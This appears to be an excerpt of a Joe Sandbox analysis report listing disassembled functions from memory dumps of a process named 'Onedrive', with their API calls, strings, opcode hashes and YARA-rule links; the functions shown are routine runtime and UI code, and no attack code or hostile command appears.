Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: Concurrency::details::_SchedulerScheduler::___crt_scoped_stack_ptr
String ID: %ls$__crt_stdio_output::stream_output_adapter<char>::validate$_stream.valid()$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
API String ID: 614740146-3062203921
Opcode ID: da9eb8b382213a47e1979488ef243cce5ad89bb937ccf66715edfc33a6e5e3b0
Instruction ID: 0d91eb17b81f9e8fd0c24331addee32c920175e0cb02f57cd80bf443252ca4b9
Opcode Fuzzy Hash: da9eb8b382213a47e1979488ef243cce5ad89bb937ccf66715edfc33a6e5e3b0
Instruction Fuzzy Hash: AE214832A1AF43A5EF509B91F44536A67A0EB883D1F401435EA8E4BB9ADF7DD1458B00

Function 00007FF6104FBAA4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

StrToID.DUI70(?,?,?,00007FF6104FB792), ref: 00007FF6104FBAB8
?FindDescendent@Element@DirectUI@@QEAAPEAV12@G@Z.DUI70(?,?,?,00007FF6104FB792), ref: 00007FF6104FBACB
?SetLayoutPos@Element@DirectUI@@QEAAJH@Z.DUI70(?,?,?,00007FF6104FB792), ref: 00007FF6104FBAEB
?SetContentString@Element@DirectUI@@QEAAJPEBG@Z.DUI70(?,?,?,00007FF6104FB792), ref: 00007FF6104FBB1A

Strings

ErrorCID, xrefs: 00007FF6104FBAB1

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: DirectElement@$ContentDescendent@FindLayoutPos@String@V12@
String ID: ErrorCID
API String ID: 3607310075-3250631935
Opcode ID: ce93dbfc43d74a60a407e702ffc4fe4b9774dc6bdd616480cdfaf7f93e13af0d
Instruction ID: 95542373f97171127a414af130cdc165b844e5d7105efc143fd0423da427e179
Opcode Fuzzy Hash: ce93dbfc43d74a60a407e702ffc4fe4b9774dc6bdd616480cdfaf7f93e13af0d
Instruction Fuzzy Hash: DE113C21B0CF42D3EF059B2AA59017DA6A5EF8AFA4B449030DA0EC3749DF2CE8548740

Function 00007FF8A0305480 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 00007FF8A0305496
GetLastError.KERNEL32 ref: 00007FF8A03054B0
wcsncmp.LIBCMTD ref: 00007FF8A03054CD
LoadLibraryExW.KERNEL32 ref: 00007FF8A03054E0

Strings

api-ms-, xrefs: 00007FF8A03054C1

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: LibraryLoad$ErrorLastwcsncmp
String ID: api-ms-
API String ID: 3100911417-2084034818
Opcode ID: ba16ec61bd4ea2d1e44a15f40657637409a1c94ef855eeb3ad1471bcfd6b1ded
Instruction ID: fa2719d90c2b8037f3f6c9d27c7a239e1ae2dac73ce684e3432226a1a3d3ea4d
Opcode Fuzzy Hash: ba16ec61bd4ea2d1e44a15f40657637409a1c94ef855eeb3ad1471bcfd6b1ded
Instruction Fuzzy Hash: F0F0EC25E1FD53A2EA609B56E84436B62B0FB857C2FA04030DA8D9AB64DF2DD585CB00

Function 00007FF6104F7F30 Relevance: 7.8, APIs: 6, Instructions: 274memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF6104F8285
HeapFree.KERNEL32 ref: 00007FF6104F8299
GetProcessHeap.KERNEL32 ref: 00007FF6104F82CF
HeapFree.KERNEL32 ref: 00007FF6104F82E3

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 1fd54e66757fca2a8a023022cf3ea0a43d87e6440a2a77e324f2d085da150cf1
Instruction ID: e6a4cf92d5cf5ce5a372889fdcb59a0dae4bfa5e93e02fb53c6a725bb3c00a04
Opcode Fuzzy Hash: 1fd54e66757fca2a8a023022cf3ea0a43d87e6440a2a77e324f2d085da150cf1
Instruction Fuzzy Hash: 2AB15122B04E12A6FF00DA7AC8902BD27A5BF84FA8F464535DA0DCB795DE3DE8558350

Function 00007FF8A0339A00 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 264COMMON

Download Yara Rule

Strings

s != nullptr, xrefs: 00007FF8A0339A9D, 00007FF8A0339B29
%ls, xrefs: 00007FF8A0339AA9
minkernel\crts\ucrt\src\appcrt\convert\mbstowcs.cpp, xrefs: 00007FF8A0339ABE, 00007FF8A0339B1B
_mbstowcs_l_helper, xrefs: 00007FF8A0339B22

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID:
String ID: %ls$_mbstowcs_l_helper$minkernel\crts\ucrt\src\appcrt\convert\mbstowcs.cpp$s != nullptr
API String ID: 0-454128329
Opcode ID: 9608f6b4b14059f0dd94b12a202056abb71e65398b216d8978d4c59500cf97fc
Instruction ID: 9556d060cb78dbf80d36da326af695e5f8ca4b392a523f060e4eb62fe98f3bfd
Opcode Fuzzy Hash: 9608f6b4b14059f0dd94b12a202056abb71e65398b216d8978d4c59500cf97fc
Instruction Fuzzy Hash: E2D10E3661DF86D6E7608B15E49036AB7A0F7847A4F105236EA9E87BE8DF3CD444CB01

Function 00007FF6104F29B0 Relevance: 7.6, APIs: 6, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6104F6454: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6104F7F0D,?,?,?,?,00000000,00000002), ref: 00007FF6104F64C0
Part of subcall function 00007FF6104F6454: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6104F7F0D,?,?,?,?,00000000,00000002), ref: 00007FF6104F64D5
Part of subcall function 00007FF6104F6454: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6104F7F0D,?,?,?,?,00000000,00000002), ref: 00007FF6104F64F2
Part of subcall function 00007FF6104F6454: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6104F7F0D,?,?,?,?,00000000,00000002), ref: 00007FF6104F6507
Part of subcall function 00007FF6104F6454: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6104F7F0D,?,?,?,?,00000000,00000002), ref: 00007FF6104F6524
Part of subcall function 00007FF6104F6454: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6104F7F0D,?,?,?,?,00000000,00000002), ref: 00007FF6104F6539
Part of subcall function 00007FF6104F6454: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6104F7F0D,?,?,?,?,00000000,00000002), ref: 00007FF6104F6556
Part of subcall function 00007FF6104F6454: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6104F7F0D,?,?,?,?,00000000,00000002), ref: 00007FF6104F656B
Part of subcall function 00007FF6104F6454: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6104F7F0D,?,?,?,?,00000000,00000002), ref: 00007FF6104F6588
Part of subcall function 00007FF6104F6454: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6104F7F0D,?,?,?,?,00000000,00000002), ref: 00007FF6104F659D
Part of subcall function 00007FF6104F6454: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6104F7F0D,?,?,?,?,00000000,00000002), ref: 00007FF6104F65CD
Part of subcall function 00007FF6104F6454: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6104F7F0D,?,?,?,?,00000000,00000002), ref: 00007FF6104F65E1

Part of subcall function 00007FF6104F3AFC: GetProcessHeap.KERNEL32(?,?,?,00007FF6104F29DD), ref: 00007FF6104F3C8B
Part of subcall function 00007FF6104F3AFC: HeapFree.KERNEL32(?,?,?,00007FF6104F29DD), ref: 00007FF6104F3C9F

GetProcessHeap.KERNEL32 ref: 00007FF6104F29E6
HeapFree.KERNEL32 ref: 00007FF6104F29FA
GetProcessHeap.KERNEL32 ref: 00007FF6104F2A29
HeapFree.KERNEL32 ref: 00007FF6104F2A3D
GetProcessHeap.KERNEL32 ref: 00007FF6104F2A54
HeapFree.KERNEL32 ref: 00007FF6104F2A68

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: ba35523d65e235fd164357b57aa4c4825c1f669562c9924b140f98673aebaac6
Instruction ID: f170675f0c7cd86767b6cd9bfaee1303bf1c6c35a04c29c7f3960a0c72940ac3
Opcode Fuzzy Hash: ba35523d65e235fd164357b57aa4c4825c1f669562c9924b140f98673aebaac6
Instruction Fuzzy Hash: 46213832A08F41D6EB04AB66A5443B9BBA0FF89F95F49C134DA4E83759CF38D555C304

Function 00007FF8A03034D0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 240COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIMED ref: 00007FF8A03034F3

Part of subcall function 00007FF8A0303F80: _guard_icall_checks_enforced.LIBCMTD ref: 00007FF8A0303F89

Strings

csm, xrefs: 00007FF8A0303665

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: __except_validate_context_record_guard_icall_checks_enforced
String ID: csm
API String ID: 95139742-1018135373
Opcode ID: 9e062fe48b1229129d560821c3fdd2aabcdcb0dd00749ea082b421684da464b9
Instruction ID: 9730dd2c68e0223e1b8e1ab9e9769bb3908245c1d5cdac64f2dd2044c7f8cc86
Opcode Fuzzy Hash: 9e062fe48b1229129d560821c3fdd2aabcdcb0dd00749ea082b421684da464b9
Instruction Fuzzy Hash: 55C1EB7661AB8196DB50CF49E48072AB7B5F7C8B90F505025FA8E87BA8DF3CE550CB00

Function 00007FF8A032F550 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154fileCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00007FF8A03300FA), ref: 00007FF8A032F702
WriteFile.KERNEL32(?,?,00007FF8A03300FA), ref: 00007FF8A032F793
GetLastError.KERNEL32 ref: 00007FF8A032F79D

Strings

U, xrefs: 00007FF8A032F6C9

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: ErrorLast$FileWrite
String ID: U
API String ID: 603252729-4171548499
Opcode ID: 1ce957338886fed01dbc5d0847df86d0a0983a261123fab51dc7e24824622cb5
Instruction ID: 74a0f56798e6b3821875931e4bff4265a9d2c78cfe7d1093270884d7eb767740
Opcode Fuzzy Hash: 1ce957338886fed01dbc5d0847df86d0a0983a261123fab51dc7e24824622cb5
Instruction Fuzzy Hash: 6171C536609B859ADB60CB59E4403AAB7A1F798BC4F504136EB8D83B68DF7CD455CF00

Function 00007FF8A03343F0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 136COMMON

Download Yara Rule

APIs

__crt_scoped_stack_ptr.LIBCPMTD ref: 00007FF8A033440F

Strings

%ls, xrefs: 00007FF8A0334427
minkernel\crts\ucrt\src\appcrt\stdio\_flsbuf.cpp, xrefs: 00007FF8A033443C
stream.valid(), xrefs: 00007FF8A033441B

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: __crt_scoped_stack_ptr
String ID: %ls$minkernel\crts\ucrt\src\appcrt\stdio\_flsbuf.cpp$stream.valid()
API String ID: 1704660383-221745940
Opcode ID: 329b69d5496cb21c78686117c2c55843c180d98691ed8a2356b140e333f2deab
Instruction ID: 60927903832b5d0b2a86f555d10cebab75c4b015a67f81777abe8896ddc76d65
Opcode Fuzzy Hash: 329b69d5496cb21c78686117c2c55843c180d98691ed8a2356b140e333f2deab
Instruction Fuzzy Hash: 59511121A0EE4362FB10DB25E4522BB6694EF953C0FA00136E68D8A7F7DF7CE5458B41

Function 00007FF6104F351C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6104F22BC: GetProcessHeap.KERNEL32(?,?,?,00007FF6104F1D5E), ref: 00007FF6104F23D4
Part of subcall function 00007FF6104F22BC: HeapFree.KERNEL32(?,?,?,00007FF6104F1D5E), ref: 00007FF6104F23E8

Part of subcall function 00007FF6104F22BC: GetProcessHeap.KERNEL32(?,?,?,00007FF6104F1D5E), ref: 00007FF6104F233B
Part of subcall function 00007FF6104F22BC: HeapAlloc.KERNEL32(?,?,?,00007FF6104F1D5E), ref: 00007FF6104F234F
Part of subcall function 00007FF6104F22BC: memmove.MSVCRT(?,?,?,00007FF6104F1D5E), ref: 00007FF6104F237C
Part of subcall function 00007FF6104F22BC: GetProcessHeap.KERNEL32(?,?,?,00007FF6104F1D5E), ref: 00007FF6104F2392
Part of subcall function 00007FF6104F22BC: HeapFree.KERNEL32(?,?,?,00007FF6104F1D5E), ref: 00007FF6104F23A6

Part of subcall function 00007FF6104F4918: _vsnwprintf.MSVCRT ref: 00007FF6104F4958

StrToID.DUI70 ref: 00007FF6104F35B0
?FindDescendent@Element@DirectUI@@QEAAPEAV12@G@Z.DUI70 ref: 00007FF6104F35C2
?SetInputScope@TouchEdit2@DirectUI@@QEAAJW4__MIDL___MIDL_itf_inputscope_0000_0000_0001@@@Z.DUI70 ref: 00007FF6104F35D9

Part of subcall function 00007FF6104FAF8C: ?GetContentString@Element@DirectUI@@QEAAPEBGPEAPEAVValue@2@@Z.DUI70(?,?,00000000,00007FF6104F360B), ref: 00007FF6104FAFB3
Part of subcall function 00007FF6104FAF8C: ?Release@Value@DirectUI@@QEAAXXZ.DUI70(?,?,00000000,00007FF6104F360B), ref: 00007FF6104FB05A

Strings

CIDEdit%d, xrefs: 00007FF6104F3587

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: Heap$Direct$Process$Element@Free$AllocContentDescendent@Edit2@FindInputL___L_itf_inputscope_0000_0000_0001@@@Release@Scope@String@TouchV12@Value@Value@2@@W4___vsnwprintfmemmove
String ID: CIDEdit%d
API String ID: 1228671443-56484913
Opcode ID: b3f517ad8b8d331d28c16e3b81a7e2f2708fd587a33e129d640477db628184b2
Instruction ID: a132d81805989651eb0c9b47537dc6b9200666a318a242ae824e21e04c594029
Opcode Fuzzy Hash: b3f517ad8b8d331d28c16e3b81a7e2f2708fd587a33e129d640477db628184b2
Instruction Fuzzy Hash: D8317221708E42E2FF20AB26E4902A97399FB88FA5F459435DE4DC7755DF3CE5168700

Function 00007FF8A0320D10 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51COMMON

Download Yara Rule

APIs

Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FF8A0320D65

Strings

minkernel\crts\ucrt\src\appcrt\stdio\_freebuf.cpp, xrefs: 00007FF8A0320D42
%ls, xrefs: 00007FF8A0320D2D
public_stream != nullptr, xrefs: 00007FF8A0320D21

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: Concurrency::details::_SchedulerScheduler::_
String ID: %ls$minkernel\crts\ucrt\src\appcrt\stdio\_freebuf.cpp$public_stream != nullptr
API String ID: 2780765137-1254537880
Opcode ID: 9671912013f427561da62cdbcbe0db84c4c5786f34d3e8db949c768f68d6365d
Instruction ID: 738cdf267c00fd21f016d176591218f04976d54ea48f87c834fa04ef0e30a181
Opcode Fuzzy Hash: 9671912013f427561da62cdbcbe0db84c4c5786f34d3e8db949c768f68d6365d
Instruction Fuzzy Hash: 36216261A3AE43A1E740DB50E4413BA6364FFA4780F901031E58D867E7EF7CE548C740

Function 00007FF8A0318650 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42COMMON

Download Yara Rule

APIs

Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FF8A031866E
GetModuleHandleExW.KERNEL32 ref: 00007FF8A0318689

Strings

mscoree.dll, xrefs: 00007FF8A0318680
CorExitProcess, xrefs: 00007FF8A03186A9

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: Concurrency::details::_HandleModuleSchedulerScheduler::_
String ID: CorExitProcess$mscoree.dll
API String ID: 302703240-1276376045
Opcode ID: b34438bd74859ec22cf35c33e7849494b920b0bc9de5fd7c946b7d7eaf88f171
Instruction ID: f2e461cae3aba7752928ee7dee2fd78a55cee5a911571f9f5784a045fec44cd0
Opcode Fuzzy Hash: b34438bd74859ec22cf35c33e7849494b920b0bc9de5fd7c946b7d7eaf88f171
Instruction Fuzzy Hash: 80116332A1EE43A1EA20EB11E45126EB360FF887D5F500235E69E467E5EF7CD204CB00

Function 00007FF6104FB350 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

?GetRoot@Element@DirectUI@@QEAAPEAV12@XZ.DUI70 ref: 00007FF6104FB373
StrToID.DUI70 ref: 00007FF6104FB389
?FindDescendent@Element@DirectUI@@QEAAPEAV12@G@Z.DUI70 ref: 00007FF6104FB39B

Strings

EnterNumber, xrefs: 00007FF6104FB37F

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: DirectElement@V12@$Descendent@FindRoot@
String ID: EnterNumber
API String ID: 1418815912-1845196359
Opcode ID: e83e042111be38edb18aba9be0cb80e9d35a4fae5e9649dce248d94c2b7ead39
Instruction ID: bd980efd09011be356dd6676792659d21cb1e6de936d73445d64823fffe60c97
Opcode Fuzzy Hash: e83e042111be38edb18aba9be0cb80e9d35a4fae5e9649dce248d94c2b7ead39
Instruction Fuzzy Hash: 1CF04936A08F82D2DB108B06B85003DBAA4FB8AFA4B58D131DA4E83718CF3CD5518740

Function 00007FF6104FB7E0 Relevance: 6.2, APIs: 4, Instructions: 178COMMON

Download Yara Rule

APIs

?SetContentString@Element@DirectUI@@QEAAJPEBG@Z.DUI70 ref: 00007FF6104FB8B0
?SetCaretPosition@TouchEdit2@DirectUI@@QEAAJJ@Z.DUI70 ref: 00007FF6104FB8C2
?SetContentString@Element@DirectUI@@QEAAJPEBG@Z.DUI70 ref: 00007FF6104FBA17
?SetCaretPosition@TouchEdit2@DirectUI@@QEAAJJ@Z.DUI70 ref: 00007FF6104FBA2A

Part of subcall function 00007FF6104FBB50: StrToID.DUI70(?,?,00000000,00007FF6104FB9AC), ref: 00007FF6104FBB6B
Part of subcall function 00007FF6104FBB50: ?FindDescendent@Element@DirectUI@@QEAAPEAV12@G@Z.DUI70(?,?,00000000,00007FF6104FB9AC), ref: 00007FF6104FBB7E
Part of subcall function 00007FF6104FBB50: ?CreateString@Value@DirectUI@@SAPEAV12@PEBGPEAUHINSTANCE__@@@Z.DUI70(?,?,00000000,00007FF6104FB9AC), ref: 00007FF6104FBB96

Part of subcall function 00007FF6104FAF8C: ?GetContentString@Element@DirectUI@@QEAAPEBGPEAPEAVValue@2@@Z.DUI70(?,?,00000000,00007FF6104F360B), ref: 00007FF6104FAFB3
Part of subcall function 00007FF6104FAF8C: ?Release@Value@DirectUI@@QEAAXXZ.DUI70(?,?,00000000,00007FF6104F360B), ref: 00007FF6104FB05A

Part of subcall function 00007FF6104FB6D8: ?GetSelection@TouchEdit2@DirectUI@@QEAAJPEAJ0@Z.DUI70(?,?,00000000,00007FF6104FB9D1), ref: 00007FF6104FB6F6

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: Direct$Element@String@$ContentEdit2@Touch$CaretPosition@V12@Value@$CreateDescendent@E__@@@FindRelease@Selection@Value@2@@
String ID:
API String ID: 94149341-0
Opcode ID: 9617a7bb773a2561373628f6bd13398476fa04b197ade44adbcccafdb8f5e440
Instruction ID: 605b0bf60d62f540f38d0b234534456af511bb09e16899944d99bc199a30cf53
Opcode Fuzzy Hash: 9617a7bb773a2561373628f6bd13398476fa04b197ade44adbcccafdb8f5e440
Instruction Fuzzy Hash: 46712972F08D02EAEF109B69C4815BC23B9AB49FA8B545036DE0DD3769DE38E951C381

Function 00007FF6104FD06C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 129memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6104FD874: _wcsicmp.MSVCRT ref: 00007FF6104FD8EE
Part of subcall function 00007FF6104FD874: _wcsicmp.MSVCRT ref: 00007FF6104FD944

_wcsicmp.MSVCRT ref: 00007FF6104FD147
GetProcessHeap.KERNEL32(?,?,00000000), ref: 00007FF6104FD1F1
HeapFree.KERNEL32(?,?,00000000), ref: 00007FF6104FD205

Strings

VolumeActivationOrder, xrefs: 00007FF6104FD099

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: _wcsicmp$Heap$FreeProcess
String ID: VolumeActivationOrder
API String ID: 1178357170-1688881641
Opcode ID: 6c4fa031bcdf362423f6d4512dab34f2224128750b836ea986aa50372eb6991f
Instruction ID: 2b03144929a5f9099f165ee432b9ec58bf84bf2a7b475d1369fe59e1d725cae6
Opcode Fuzzy Hash: 6c4fa031bcdf362423f6d4512dab34f2224128750b836ea986aa50372eb6991f
